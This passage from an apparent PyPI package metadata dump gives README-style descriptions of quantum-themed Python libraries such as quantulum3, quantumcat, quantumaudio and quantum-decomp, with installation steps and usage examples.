them.entityis the name of an entity inentities.jsondimensionsfollows the same schema as inentities.json, but thebaseis the name of another unit, not of another entity.symbolsis a list of possible symbols and abbreviations for that unit.All fields are case sensitive."} +{"package": "quantulum3", "pacakge-description": "quantulum3Python library for information extraction of quantities, measurements\nand their units from unstructured text. It is able to disambiguate between similar\nlooking units based on theirk-nearest neighboursin theirGloVevector representation\nand theirWikipediapage.This is the Python 3 compatible fork ofrecastrodiaz'\nforkofgrhawks'\nforkofthe original by Marco\nLagi.\nThe compatibility with the newest version of sklearn is based on\nthe fork ofsohrabtowfighi.User GuideInstallationpipinstallquantulum3To install dependencies for using or training the disambiguation classifier, usepipinstallquantulum3[classifier]The disambiguation classifier is used when the parser find two or more units that are a match for the text.Usage>>>fromquantulum3importparser>>>quants=parser.parse('I want 2 liters of wine')>>>quants[Quantity(2, 'litre')]TheQuantityclass stores the surface of the original text it was\nextracted from, as well as the (start, end) positions of the match:>>>quants[0].surfaceu'2 liters'>>>quants[0].span(7, 15)Thevalueattribute provides the parsed numeric value and theunit.nameattribute provides the name of the parsed unit:>>>quants[0].value2.0>>>quants[0].unit.name'litre'An inline parser that embeds the parsed quantities in the text is also\navailable (especially useful for debugging):>>>printparser.inline_parse('I want 2 liters of wine')I want 2 liters {Quantity(2, \"litre\")} of wineAs the parser is also able to parse dimensionless numbers,\nthis library can also be used for simple number extraction.>>>printparser.parse('I want two')[Quantity(2, 'dimensionless')]Units and entitiesAll units (e.g.litre) and the entities they are associated to (e.g.volume) are reconciled against WikiPedia:>>>quants[0].unitUnit(name=\"litre\", entity=Entity(\"volume\"), uri=https://en.wikipedia.org/wiki/Litre)>>>quants[0].unit.entityEntity(name=\"volume\", uri=https://en.wikipedia.org/wiki/Volume)This library includes more than 290 units and 75 entities. It also\nparses spelled-out numbers, ranges and uncertainties:>>>parser.parse('I want a gallon of beer')[Quantity(1, 'gallon')]>>>parser.parse('The LHC smashes proton beams at 12.8\u201313.0 TeV')[Quantity(12.8, \"teraelectronvolt\"), Quantity(13, \"teraelectronvolt\")]>>>quant=parser.parse('The LHC smashes proton beams at 12.9\u00b10.1 TeV')>>>quant[0].uncertainty0.1Non-standard units usually don't have a WikiPedia page. The parser will\nstill try to guess their underlying entity based on their\ndimensionality:>>>parser.parse('Sound travels at 0.34 km/s')[0].unitUnit(name=\"kilometre per second\", entity=Entity(\"speed\"), uri=None)DisambiguationIf the parser detects an ambiguity, a classifier based on the WikiPedia\npages of the ambiguous units or entities tries to guess the right one:>>>parser.parse('I spent 20 pounds on this!')[Quantity(20, \"pound sterling\")]>>>parser.parse('It weighs no more than 20 pounds')[Quantity(20, \"pound-mass\")]or:>>>text='The average density of the Earth is about 5.5x10-3 kg/cm\u00b3'>>>parser.parse(text)[0].unit.entityEntity(name=\"density\", uri=https://en.wikipedia.org/wiki/Density)>>>text='The amount of O\u2082 is 2.98e-4 kg per liter of atmosphere'>>>parser.parse(text)[0].unit.entityEntity(name=\"concentration\", uri=https://en.wikipedia.org/wiki/Concentration)In addition to that, the classifier is trained on the most similar words to\nall of the units surfaces, according to their distance inGloVevector representation.Spoken versionQuantulum classes include methods to convert them to a speakable unit.>>>parser.parse(\"Gimme 10e9 GW now!\")[0].to_spoken()ten billion gigawatts>>>parser.inline_parse_and_expand(\"Gimme $1e10 now and also 1 TW and 0.5 J!\")Gimme ten billion dollars now and also one terawatt and zero point five joules!ManipulationWhile quantities cannot be manipulated within this library, there are\nmany great options out there:pintnatuquantitiesExtensionTraining the classifierIf you want to train the classifier yourself, you will need the dependencies for the classifier (see installation).Usequantulum3-trainingon the command line, the scriptquantulum3/scripts/train.pyor the methodtrain_classifierinquantulum3.classifierto train the classifier.quantulum3-training--lang--data--outputYou can pass multiple training files in to the training command. The output is in joblib format.To use your custom model, pass the path to the trained model file to the\nparser:parser = Parser.parse(, classifier_path=\"path/to/model.joblib\")Example training files can be found inquantulum3/_lang//train.If you want to create a new or differentsimilars.json, installpymagnitude.For the extraction of nearest neighbours from a vector word representation file,\nusescripts/extract_vere.py. It automatically extracts theknearest neighbours\nin vector space of the vector representation for each of the possible surfaces\nof the ambiguous units. The resulting neighbours are stored inquantulum3/similars.jsonand automatically included for training.The file provided should be in.magnitudeformat as other formats are first\nconverted to a.magnitudefile on-the-run. Check outpre-formatted Magnitude formatted word-embeddingsandMagnitudefor more information.Additional unitsIt is possible to add additional entities and units to be parsed by quantulum. These will be added to the default units and entities. See below code for an example invocation:>>>fromquantulum3.loadimportadd_custom_unit,remove_custom_unit>>>add_custom_unit(name=\"schlurp\",surfaces=[\"slp\"],entity=\"dimensionless\")>>>parser.parse(\"This extremely sharp tool is precise up to 0.5 slp\")[Quantity(0.5, \"Unit(name=\"schlurp\", entity=Entity(\"dimensionless\"), uri=None)\")]The keyword arguments to the functionadd_custom_unitare directly translated\nto the properties of the unit to be created.Custom Units and EntitiesIt is possible to load a completely custom set of units and entities. This can be done by passing a list of file paths to the load_custom_units and load_custom_entities functions. Loading custom untis and entities will replace the default units and entities that are normally loaded.The recomended way to load quantities is via a context manager:>>>fromquantulum3importload,parser>>>withload.CustomQuantities([\"path/to/units.json\"],[\"path/to/entities.json\"]):>>>parser.parse(\"This extremely sharp tool is precise up to 0.5 slp\")[Quantity(0.5, \"Unit(name=\"schlurp\", entity=Entity(\"dimensionless\"), uri=None)\")]>>># default units and entities are loaded againBut it is also possible to load custom units and entities manually:>>>fromquantulum3importload,parser>>>load.load_custom_units([\"path/to/units.json\"])>>>load.load_custom_entities([\"path/to/entities.json\"])>>>parser.parse(\"This extremely sharp tool is precise up to 0.5 slp\")[Quantity(0.5, \"Unit(name=\"schlurp\", entity=Entity(\"dimensionless\"), uri=None)\")]>>># remove custom units and entities and load default units and entities>>>load.reset_quantities()See the Developer Guide below for more information about the format of units and entities files.Developer GuideAdding Units and EntitiesSeeunits.jsonfor the complete list of units andentities.jsonfor\nthe complete list of entities. The criteria for adding units have been:the unit has (or is redirected to) a WikiPedia pagethe unit is in common use (e.g. not thepremetric Swedish units of\nmeasurement).It's easy to extend these two files to the units/entities of interest.\nHere is an example of an entry inentities.json:\"speed\":{\"dimensions\":[{\"base\":\"length\",\"power\":1},{\"base\":\"time\",\"power\":-1}],\"URI\":\"https://en.wikipedia.org/wiki/Speed\"}Thenameof an entity is its key. Names are required to be unique.URIis the name of the wikipedia page of the entity. (i.e.https://en.wikipedia.org/wiki/Speed=>Speed)dimensionsis the dimensionality, a list of dictionaries each\nhaving abase(the name of another entity) and apower(an\ninteger, can be negative).Here is an example of an entry inunits.json:\"metre per second\":{\"surfaces\":[\"metre per second\",\"meter per second\"],\"entity\":\"speed\",\"URI\":\"Metre_per_second\",\"dimensions\":[{\"base\":\"metre\",\"power\":1},{\"base\":\"second\",\"power\":-1}],\"symbols\":[\"mps\"]},\"year\":{\"surfaces\":[\"year\",\"annum\"],\"entity\":\"time\",\"URI\":\"Year\",\"dimensions\":[],\"symbols\":[\"a\",\"y\",\"yr\"],\"prefixes\":[\"k\",\"M\",\"G\",\"T\",\"P\",\"E\"]}Thenameof a unit is its key. Names are required to be unique.URIfollows the same scheme as in theentities.jsonsurfacesis a list of strings that refer to that unit. The library\ntakes care of plurals, no need to specify them.entityis the name of an entity inentities.jsondimensionsfollows the same schema as inentities.json, but thebaseis the name of another unit, not of another entity.symbolsis a list of possible symbols and abbreviations for that\nunit.prefixesis an optional list. It can containMetricandBinary prefixesand\nautomatically generates according units. If you want to\nadd specifics (like different surfaces) you need to create an entry for that\nprefixes version on its own.All fields are case sensitive.Contributingdevbuild:If you'd like to contribute follow these steps:Clone a fork of this project into your workspaceRunpip install -e .at the root of your development folder.pip install pipenvandpipenv shellInside the project folder runpipenv install --devMake your changesRunscripts/format.shandscripts/build.pyfrom the package root directory.Test your changes withpython3 setup.py test(Optional, will be done automatically after pushing)Create a Pull Request when having commited and pushed your changesLanguage supportThere is a branch for language support, namelylanguage_support.\nFrom inspecting theREADMEfile in the_langsubdirectory and\nthe functions and values given in the new_lang.en_USsubmodule,\none should be able to create own language submodules.\nThe new language modules should automatically be invoked and be available,\nboth through thelang=keyword argument in the parser functions as well\nas in the automatic unittests.No changes outside the own language submodule folder (i.e._lang.de_DE) should\nbe necessary. If there are problems implementing a new language, don't hesitate to open an issue."} +{"package": "quantum", "pacakge-description": "Quantum (virtual network service)"} +{"package": "quantum6g", "pacakge-description": "Quantum6G: Auto AI Advanced Quantum Neural Networks with 6G TechnologyQuantum6G is an automatic artificial intelligence library that combines quantum computing and 6G technologies to build advanced quantum neural networks. It provides a high-level interface for constructing, training, and evaluating quantum neural networks. This library was developed byQuantum PIYA.InstallationTo install the Quantum6G library, simply run the following command:pip install quantum6gGetting StartedHere is a simple example to get started with the Quantum6G library:from quantum6g import Quantum6GCreate a quantum neural networkquantum_6g = Quantum6G(output_unit=1, num_layers=4, epochs=2, loss='mse', input=4, batch_size=256, learning_rate=0.2)Build the modelquantum_6g = quantum_6g.build_model(X_train, y_train, X_test, y_test)Evaluate the modelprint(\"Accuracy: {:.2f}%\".format(quantum_6g[1][1] * 100))\nprint(\"Loss: {:.2f}%\".format(quantum_6g[1][0] * 100))Build and Fit Quantum6G_KNN --- from v1.2.5Vquantum_knn = Quantum6G_KNN(n_qubits=4, n_neighbors=6)\nquantum_knn.fit(X_train, y_train)Evaluate the Quantum6G_KNN modelquantum_pred = quantum_knn.predict(X_test,y_test)\nquantum_accuracy = accuracy_score(y_test, quantum_pred)\nprint(f\"Accuracy of Quantum6G_KNN: {quantum_accuracy:.3f}\")Build Quantum Model for QCNN (Quantum Convolutional Neural Network) --- from v1.3.0Vq_cnn = QCNN(\n input_shape=(2, 2, 1),\n output_neurons=10,\n loss_function=\"sparse_categorical_crossentropy\",\n epochs=5,\n batch_size=32,\n optimizer=\"adam\",\n n_layers=1,\n n_wires=4,\n)\nq_cnn_model = q_cnn.build_model()Evaluate the QCNN modelq_cnn.benchmark(q_cnn_model, x_train_resized[..., np.newaxis], y_train, x_test_resized[..., np.newaxis], y_test)DonateYou can donate for this project!ETH - ERC20: 0xa6F7170Ca63cf284A8ba6339b565445468E04Ff2BTC - Bech32: bc1qfek2lun4tc7d7zftz0v4auxc9dzn77h9xq9x26v02u6s3rgl7hesxt4r2hUSDT - TRC20: TWVcF24DjPnGfhegmJjBQw2iE4vxQBuYTYDocumentationFor more information on how to use the Quantum6G library, please refer to the documentation available at [the soon].ContributingWe welcome contributions to the Quantum6G library. If you would like to contribute, please fork the repository and make your changes, then submit a pull request.LicenseThe Quantum6G library is open source and released under the MIT license. For more information, please see theLICENSEfile."} +{"package": "quantum-android", "pacakge-description": "No description available on PyPI."} +{"package": "quantumania", "pacakge-description": "A command line app for taking beautiful quantum notes.qlmgives you access to beautiful quantum notes on any machine.The name comes from the Arabic word for pen:\u0642\u0644\u0645which makes use of the three letter rootq-l-mto cut, snip, prune, clip or truncate. So\ntry to keep those notes concise ;-)Basic Usagepip install quantumania\nqlm connect 'username/repo'\necho '# My notes' > my_note.md\nqlm add my_note.md\nqlm show my_note.md$u42{8haO69Y7DRocF69dniotOAWEI06opV0D}"} +{"package": "quantum-assembler", "pacakge-description": "No description available on PyPI."} +{"package": "quantumatrix", "pacakge-description": "soon"} +{"package": "quantumaudio", "pacakge-description": "quantumaudioQuantumaudio Module: A Python package for Quantum Representations of Audio in qubit systems & examplesquantumaudiois a Python module with class implementations for building quantum circuits that encode and decode audio signals as quantum states. This is primarily aimed for quantum computing simulators, but itmightalso run on real quantum hardware. The main objective is to have a readily available tools for using quantum representations of audio in artistic contexts and for studying future Quantum Signal Processing algorithms for audio.This package contains class implementations for generating quantum circuits from audio signals, as well as necessary pre and post processing functions.It contatins implementations for three representation algorithms cited on the publication above, namely:QPAM - Quantum Probability Amplitude Modulation (Simple quantum superposition or \"Amplitude Encoding\")SQPAM - Single-Qubit Probability Amplitude Modulation (similar toFRQIquantum image representations)QSM - Quantum State Modulation (also known asFRQAin the literature)For an introduction to quantum audio please refer to the book chapterQuantum Representations of Sound: From Mechanical Waves to Quantum Circuitsby Paulo V. Itabora\u00ed and Eduardo R. Miranda (draft versionavailable at ArXiV). The chapter also discusses QPAM, SQPAM and QSM, and glances over methods to implement quantum audio signal processing.Additional documentaion is availableherealong with a Jupyter Notebooktutorialshowing how the main methods work and general implementation workflow with the package. Additionally, to listen the results, there is a set ofexamplesfor interfacing the quantum circuits withSuperCollider, a powerful synthesis engine for live musical applications.DependenciesThequantumaudiopackage alone has the following dependencies:qiskit (the quantum programming framework)numpymatplotlibbitstring (for decoding purposes)ipython (for listening purposes inside jupyter notebooks)For running thesupercollider examples, additional packages are needed:SuperCollider scsynth (install SuperCollider)Cythonpyliblopython-supercollider client(pip install supercollider)InstallationThis python module is distributed as a package in PyPi. It can be installed in any operating system by usingpipin a console or terminal:Windowspip install quantumaudioMac & Linuxpip3 install quantumaudioOptionally, you can download the latestrelease, which also contains the examples and tutorial notebooks.It is possible to install the additional python dependencies for running the supercollider examples automatically, by running the installation command with the[examples]optional dependencies:Windowspip install quantumaudio[examples]Mac & Linuxpip3 install quantumaudio[examples]Jupyter Notebook ExamplesIdeally, you wouldpip installthe package in your own python environment and then download the latest example/tutorial files from thereleasespage.NOTEThere is a known bug when installingpyliblopackages throughpip install quantumaudio[examples]in some systems. A temporary workaround is shownhere.UsageTo learn how to use this module, refer to thetutorialnotebook.Both the tutorial and supercollider examples were written asJupyter Notebooksthat can be read inside this repo, or run in your local Jupyter Notebook server.Feedback and Getting helpPlease open anew issue, to help improve the code. They are most welcome.You may gain insight by learning more aboutQiskitandSuperCollider. We also strongly reccomend the reading of theQuantum Representations of Soundbook chapter for a better understanding of quantum representations of audio.API ReferenceMost methods and functions in the module contain docstrings for better understanding the implementation. This API documentation is available and readablehere.ContributingClone/Fork this repo and help contributing to the code! Pull Requests are very welcome. You can also contact themain authorto exchange ideas (highly reccomended). Make sure to install the[dev]and[doc]optional dependencies for running necessarypytests.AcknowledgementsThis repo was created by the quantum computer music team at theInterdisciplinary Centre for Computer Music Research (ICCMR), University of Plymouth, UK.Paulo Itabora\u00edis the lead developer.See also theQuTune Projectrepository for other resources developed by the ICCMR group.quantumaudiohas anMIT license. If you use this code in your research or art, please cite it according to thecitation file.THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE."} +{"package": "quantum-automated-system-for-advanced-recycling", "pacakge-description": "No description available on PyPI."} +{"package": "quantum-blackbird", "pacakge-description": "Blackbird is a quantum assembly language for continuous-variable quantum computation, that can be used to program Xanadu\u2019s quantum photonics hardware and Strawberry Fields simulator.FeaturesThe Blackbird repository contains threeseparatepackages:src: The Blackbird grammar specification in enhanced Brackus-Naur formblackbird_python: to develop Blackbird parsers for integration with Python programsblackbird_cpp: libraries and header files needed to develop Blackbird\nparsers for integration with C++ programsAll of these packages are independent, and can be installed separately without\ndepending on one-another.However, if the grammar is ever modified, there\nis a command for updating the autogenerated parts of the Python and C++\nparsers.In addition, this repository contains:example: Example Blackbird scriptsapps: Example Python/C++ applications using the above parsersGetting startedBlackbird is a development library, designed to easily integrate Blackbird code\ninto applications and interfaces.To get the Blackbird grammar installed and running on your system, begin at thegrammar installation guide. Then, familiarize yourself with the Blackbird\u2019ssyntax and grammarfor specifying photonic quantum circuits. You can even generate Blackbird parsers for any target language supported\nby ANTLR, including Java, C#, JavaScript, Go, and Swift.If you only want to develop an application that makes use of thePython parseror theC++ parser, you can go directly to those sections and their corresponding installation guides.How to citeIf you are doing research using Blackbird, please citeNathan Killoran, Josh Izaac, Nicol\u00e1s Quesada, Ville Bergholm, Matthew Amy, and Christian Weedbrook.Strawberry Fields: A Software Platform for Photonic Quantum Computing2018.arXiv:1804.03159SupportSource Code:https://github.com/XanaduAI/BlackbirdIssue Tracker:https://github.com/XanaduAI/Blackbird/issuesIf you are having issues, please let us know by posting the issue on our Github issue tracker.LicenseBlackbird isfreeandopen source, released under the Apache License, Version 2.0."} +{"package": "quantumcarrot", "pacakge-description": "#######\nimport quatumcarrot\nquatumcarrot.curse()\n#######"} +{"package": "quantumcat", "pacakge-description": "Introductionquantumcat is a platform-independent, open-source, high-level quantum computing library, which allows the quantum community to focus on developing platform-independent quantum applications without much effort.It is based on two principles:Write once and execute on any supported quantum provider using one syntaxquantumcat should enable researchers and developers to create quantum applications using high-level programming in the future so that they can focus on developing quantum applications instead of learning low-level concepts such as gates and circuitsWrite oncefromquantumcat.utilsimportprovidersnum_of_qubits=2qc=QCircuit(num_of_qubits)qc.h_gate(0)qc.cx_gate(0,1)# To execute on Google Cirqresult=qc.execute(provider=providers.GOOGLE_PROVIDER,repetitions=1024)# To execute on IBM Qiskitresult=qc.execute(provider=providers.IBM_PROVIDER,repetitions=1024)# To execute on Amazon Braketresult=qc.execute(provider=providers.AMAZON_PROVIDER,repetitions=1024)Compare the results of all the supported providers with a single line of code# Execute on All providers in one gocircuit.compare_results(plot=True)Execute on real IBM quantum hardware with quantumcatfromquantumcat.utilsimportprovidersresult=qc.execute(provider=providers.IBM_PROVIDER,api='API KEY from IBM Quantum dashboard',device='IBM DEVICE NAME such as ibmq_manila or ibmq_quito')# Copy API and Device name from https://quantum-computing.ibm.com/InstallationpipinstallquantumcatPlatforms SupportedGoogle CirqIBM QiskitAmazon BraketIonQ (Via Braket)Rigetti (Via Braket)Gates SupportedClick here to view gates supportedExamplesCircuit Creationfromquantumcat.circuitimportQCircuitnum_of_qubits=3qc=QCircuit(num_of_qubits)Single-Qubit Gateqc.x_gate(0)# applies X gate on qubit 0Two-Qubit Gateqc.cx_gate(0,1)# control qubit, target qubitMulti-Qubit Gateqc.mct_gate([0,1],2)# control qubits array, target qubitDraw Circuitfromquantumcat.utilsimportprovidersqc.draw_circuit(provider=providers.GOOGLE_PROVIDER)High-Level FunctionsSuperpositionqc.superposition(0)# puts qubit 0 in superpositionEntanglementqc.entangle(0,1)# entangles qubit 0 with qubit 1Phase Kickbackqc.phase_kickback(0)# applies |-> to qubit 0High-Level ApplicationsRandom Number Generatorfromquantumcat.utilsimportproviders,constantsfromquantumcat.applications.generatorimportRandomNumberrandom_number=RandomNumber(length=2,output_type=constants.DECIMAL).execute(provider=providers.GOOGLE_PROVIDER)print(random_number)# To generate random number on actual IBM devicerandom_number=RandomNumber(length=2,output_type=constants.DECIMAL).execute(provider=providers.IBM_PROVIDER,repetitions=1024,api='API KEY from IBM Quantum dashboard'device='IBM DEVICE NAME such as ibmq_manila or ibmq_quito')print(random_number)Password Generatorfromquantumcat.applications.generatorimportPasswordpassword=Password(8).generate()print(password)# Length should be between 5 - 20# Password is generated in hexadecimal format using QRNG@ANU JSON APIOTP Generatorfromquantumcat.applications.generatorimportOTPotp=OTP().generate()print(otp)# 5 digits OTP is generated using QRNG@ANU JSON APIVisualizationHistogramcircuit=QCircuit(1)circuit.superposition(0)counts=circuit.execute(provider=providers.GOOGLE_PROVIDER,repetitions=1024)circuit.histogram(counts)Bloch Multivectorcircuit=QCircuit(1)circuit.superposition(0)state=circuit.execute(provider=providers.GOOGLE_PROVIDER,simulator_name=constants.STATEVECTOR_SIMULATOR)circuit.bloch_multivector(state)QSpherecircuit=QCircuit(1)circuit.superposition(0)state=circuit.execute(provider=providers.GOOGLE_PROVIDER,simulator_name=constants.STATEVECTOR_SIMULATOR)circuit.state_qsphere(state)LicenseApache License 2.0"} +{"package": "quantum-circuit-slicer", "pacakge-description": "Quantum Circuit Slicer (QCS)This repo contains files to add a quantum circuit slicer to Qiksit. The slicer provides some useful functions for debugging quantum circuits.The circuit slicer includes:The addition of the \"breakbarrier\" object, which acts as a breakpoint for quantum circuits.Vslicer function to divide the circuit vertically.Hslicer to remove unused qubits in a particular slice.Gate tracking when you enter debugging mode by calling the startDebug function.Perform queries on a specific gate within a circuit.InstructionsInstallationTo use the circuit slicer, you need to have a working version of Qiskit (version 0.19.6 or higher)pip install quantum-circuit-slicerTestOnce the package is installed, try running the file test.py to make sure eveything is installed and working properly, and how to use the slicer."} +{"package": "quantum-cli", "pacakge-description": "No description available on PyPI."} +{"package": "quantum-cocoa", "pacakge-description": "No description available on PyPI."} +{"package": "quantum-computer", "pacakge-description": "No description available on PyPI."} +{"package": "quantumcomputingsim", "pacakge-description": "Quantum Computing SimulatorA python library to simulate quantum programs and circuits.Table of ContentsTable of ContentsGetting StartedPrerequisitesInstallingUsageAuthorsGetting StartedThese instructions will get you a copy of the project up and running on your local machine for development and testing purposes. Seedeploymentfor notes on how to deploy the project on a live system.PrerequisitesThis library is self contained, and optionally uses matplotlib for plotting graphs.InstallingThis library can be installed from pypi using pip:$ pip install quantumcomputingsimTo make sure everything installed properly, import the main and only module in python:from quantum import *UsageGo through example.ipynb for a comprehensive guide on using this librarySample workflow:entangler = qprogram(\n nqbits = 2,\n name = \"Entangler\"\n)\nentangler.addgates(0, [HGATE, CNOT0])\nentangler.compile()Compiler result:Compiling Entangler...\n\nEntangler\nq0(0) \u2b95 -----[ h ]--\u2308 c0 c0 \u2309-------\nq1(0) \u2b95 ------------\u230a c0 c0 \u230b-------\n\n\nCompilation of Entangler complete!and to run the program:entangler.run(graph = True)and view bloch spheres for qubits:plotbloch(HGATE * [0, 1])Authors@stealthypanda- Idea & Initial work"} +{"package": "quantumcore.contenttypes", "pacakge-description": "IntroductionChangelog0.1.1 (2011-02-27)fixed initial release with proper MANIFEST"} +{"package": "quantumcore.exceptions", "pacakge-description": "Introduction============Change history**************Changelog=========0.1 - Unreleased----------------* Initial releaseDownload********"} +{"package": "quantumcore.resources", "pacakge-description": "Here is an example on how to use it with CSS resources.First we setup some resources:from quantumcore.resources import CSSResourceManager, css_from_pkg_stream\nfrom quantumcore.resources import JSResourceManager, js_from_pkg_stream, jst_from_pkg_stream\n\nr1 = css_from_pkg_stream(__name__,\n 'static/css/screen.css',\n merge=True,\n auto_reload=True)\nr2 = css_from_pkg_stream(__name__,\n 'static/css/addons.css',\n merge=True,\n auto_reload=True)\nr3 = css_from_pkg_stream(__name__,\n 'static/css/print.css',\n merge=True,\n name=\"print\",\n auto_reload=True)\ncss_manager = CSSResourceManager([r1,r2,r3],\n prefix_url=\"/css\",\n auto_reload=True)\n\n# JS\njs_manager = JSResourceManager([\n js_from_pkg_stream(__name__,\n 'static/js/jquery.json-2.2.min.js',\n merge=True, prio=2),\n js_from_pkg_stream(__name__,\n 'static/js/jquery.cookie.js',\n merge=True,\n minimize_method=\"jsmin\",\n prio=3),\n ], prefix_url=\"/js\", auto_reload=True)This defines two CSS and two JS resources.Instantiating resourcesA resource corresponds to one file on the filesystem. Here we use a shortcut calledjs_from_pkg_streamandcss_from_pkg_streamto load a file from a package.Mandatory common parameters for those functions are:The__name__is being used for identifying the filename inside a package.The path is the path inside the package the__name__belongs to.Optional arguments are:mergedefines if the resource is allowed to be merged with other similar resources. Default isTrue.Withprioyou can define the order of the resources inside a resource manager. Resources with lower numbers are loaded first. Default is1.nameis an optional name under which resources can be clustered together. Resources with the same name can be retrieved together then. It defaults to\"\". In the example the first two CSS resources will be retrieved together because they both have the same empty name.processorsdefine an optional list of processor functions which take the resource contents as input and output another (e.g. compressed) version.auto_reloaddefines whether the resource can be reloaded or not. Note that this must be set in the Resource and the Resource Manager.CSS specific parametersmediafdefines the media type to be used for this stylesheet, e.g.printorscreen. It can be a string or a list of strings. Default is['screen', 'projection'].JS specific parametersminimize_methodis either\"jsmin\"orNoneand if the first is given then the JavaScript code will also be minified, meaning the removal of whitespaces and shortening of variables.Instantiating the Resource ClassesIn case you have a string you can also directly instantiating theCSSResourceorJSResourceclass:r = CSSResource(\n source = u'my CSS',\n minimize_method = None,\n media = ['projection', 'screen'],\n type_ = u'text/css',\n ...\n)\n\nr = JSResource(\n source = u'my JS',\n minimize_method = None,\n type_ = u'text/css',\n ...\n)Except__name__andfilenameall the above mentioned parameters apply.Resource ManagersIn the example above we have seen resource managers like this:css_manager = CSSResourceManager([r1,r2,r3],\n prefix_url=\"/css\",\n auto_reload=True)\n\njs_manager = JSResourceManager([.....],\n prefix_url=\"/js\",\n auto_reload=True)They handle all the CSS and JS files used in a project eventually grouped into clusters.Both versions take aprefix_urlunder which they are served later on. This defines which URLs will be computed by the manager instance.Optional parameters are:no_mergecan beTrueorFalseand defines whether the resources are merged into clusters or not.auto_reloaddefines whether the manager should test if resources have been changed and should be reloaded. This only works if the resources haveauto_reloadset toTrueas well.We can also add resources later:css_manager.append(resource3)\njs_manager.append(resource4)Now we can pass this resource object to a template, e.g. to a Chameleon template:template.render(js_manager = js_manager, css_manager = css_manager)The template code then looks like this:\nThis will render links to all the unnamed clusters (means resources with nonameparameter\ngiven). You can also render links to all resources with a certain name like this:will render all resources withname='ie'.In the resulting HTML this will look similar to this:\n\n\nAs you can see the resources are clustered together into files if possible. Moreover a cache key is given to each resource link which will change if the contents change.Serving resourcesTo serve those files we have to pass the URL to the resource registry. Inside a WSGI app this might look like this:def __call__(self, environ, start_response):\n path = environ['PATH_INFO'].split(\"/\")\n\n if path[1]==\"css\":\n css_manager.render_wsgi(environ, start_response)\n elif path[1]==\"js\":\n js_manager.render_wsgi(environ, start_response)This will take the path inside the WSGI environment and check if it matches one of the generated URLs.Without WSGI it might look like this:code, data, headers = resources.render(url)datais an iterator with the merged and minimized CSS file,codeis the return code, usually200 Ok.headersis a list of(key, value)tuples.Change history0.6 - (unreleased)fixed naming bug: if resources have different names and different prios they only have been sorted\nby priority. This led to merge errors as the name kept changing while trying to merge.\nNow they are sorted by name first and priority then.0.5 - (2010/04/06)initial releaseDownload"} +{"package": "quantumcore.storages", "pacakge-description": "quantumcore.storagesis a collection of different storage mechanisms for various kinds\nof data such as binary objects (files, images etc.), dictionary like documents and more.It will support backends like GridFS, S3, MongoDB and others.Change history0.009 - (2011/02/23)FileSystemStorage: added a copy() method. It takes a source filename and an\noptional destination filename and copies a file0.008 - (2011/02/22)FileSystemStorage: sizeof() now returns bytes instead of KBFileSystemStorage: implemented get() as alias for __getitem__()0.007 - (????)initial releaseDownload"} +{"package": "quantumcrypt", "pacakge-description": "hehe"} +{"package": "quantum-cryptography", "pacakge-description": "soon"} +{"package": "quantum-curses", "pacakge-description": "No description available on PyPI."} +{"package": "quantumdata-sdk", "pacakge-description": "Quantumdata sdkauth tokenwrite to me on rafalniewinski95@gmail.com \nif you want get access to our databasesimple usage:get companies:\n\n api = QuantumDataApi(API_TOKEN)\n response = api.get_companies()\n\n\nget quotations:\n\n api = QuantumDataApi(API_TOKEN)\n response = api.get_quotations(\"KGHM\")\n\n\nget reports:\n\n api = QuantumDataApi(API_TOKEN)\n response = api.get_reports(\"KGHM\")"} +{"package": "quantum-dataset", "pacakge-description": "Quantum DatasetA collection of measurements on quantum devices.The data for the QuantumDataset is attached to the github release namedTest, seehttps://github.com/QuTech-Delft/quantum_dataset/releases/tag/TestExample usagefrom quantumdataset import QuantumDataset\nquantum_dataset=QuantumDataset(data_directory=None)\nquantum_dataset.list_tags()\n\ndataset = quantum_dataset.load_dataset('allxy', 0)\nquantum_dataset.plot_dataset(dataset)\n\nquantum_dataset.generate_overview_page(quantum_dataset.data_directory / 'overview')"} +{"package": "quantum-decomp", "pacakge-description": "Tool for decomposing unitary matrix into quantum gatesThis is a Python tool which takes a unitary matrix and returns\na quantum circuit implementing it as Q# code, Cirq circuit, or Qiskit circuit.Installingpip install quantum-decompExample>>>importnumpy,quantum_decomp>>>SWAP=numpy.array([[1,0,0,0],[0,0,1,0],[0,1,0,0],[0,0,0,1]])>>>print(quantum_decomp.matrix_to_qsharp(SWAP,op_name='Swap'))operationSwap(qs:Qubit[]):Unit{CNOT(qs[1],qs[0]);CNOT(qs[0],qs[1]);CNOT(qs[1],qs[0]);}>>>print(quantum_decomp.matrix_to_cirq_circuit(SWAP))0:\u2500\u2500\u2500@\u2500\u2500\u2500X\u2500\u2500\u2500@\u2500\u2500\u2500\u2502\u2502\u25021:\u2500\u2500\u2500X\u2500\u2500\u2500@\u2500\u2500\u2500X\u2500\u2500\u2500>>>print(quantum_decomp.matrix_to_qiskit_circuit(SWAP))\u250c\u2500\u2500\u2500\u2510\u250c\u2500\u2500\u2500\u2510q_0:\u2524X\u251c\u2500\u2500\u25a0\u2500\u2500\u2524X\u251c\u2514\u2500\u252c\u2500\u2518\u250c\u2500\u2534\u2500\u2510\u2514\u2500\u252c\u2500\u2518q_1:\u2500\u2500\u25a0\u2500\u2500\u2524X\u251c\u2500\u2500\u25a0\u2500\u2500\u2514\u2500\u2500\u2500\u2518Seeexample.ipynbfor more examples and instructions how to\nuse this tool.ReferencesThis tool was inspired byMicrosoft Q# Coding Contestand was implemented as part of online course \"Applications of Quantum Mechanics\" at MIT.See thispaperfor detailed description\nof the algorithm and further references to papers with algorithms.Blog postabout the tool."} +{"package": "quantum-demo", "pacakge-description": "No description available on PyPI."} +{"package": "quantum-dice", "pacakge-description": "The Quantum Dice leverages the IBM Q quantum computer to generate a truly random set of numbers."} +{"package": "quantumdiceware", "pacakge-description": "Generate truly random diceware passphrases.FeaturesSimulates dice rolls by gathering quantum data.Includes the complete standard Diceware wordlist.Generate passphrases from custom wordlists.Python 3.6 is required.UsageInstall$ pip install quantumdicewareGenerate a Passphrase$ qdgGenerate five Passphrases and save them to output.txt$ qdg -c 5 > 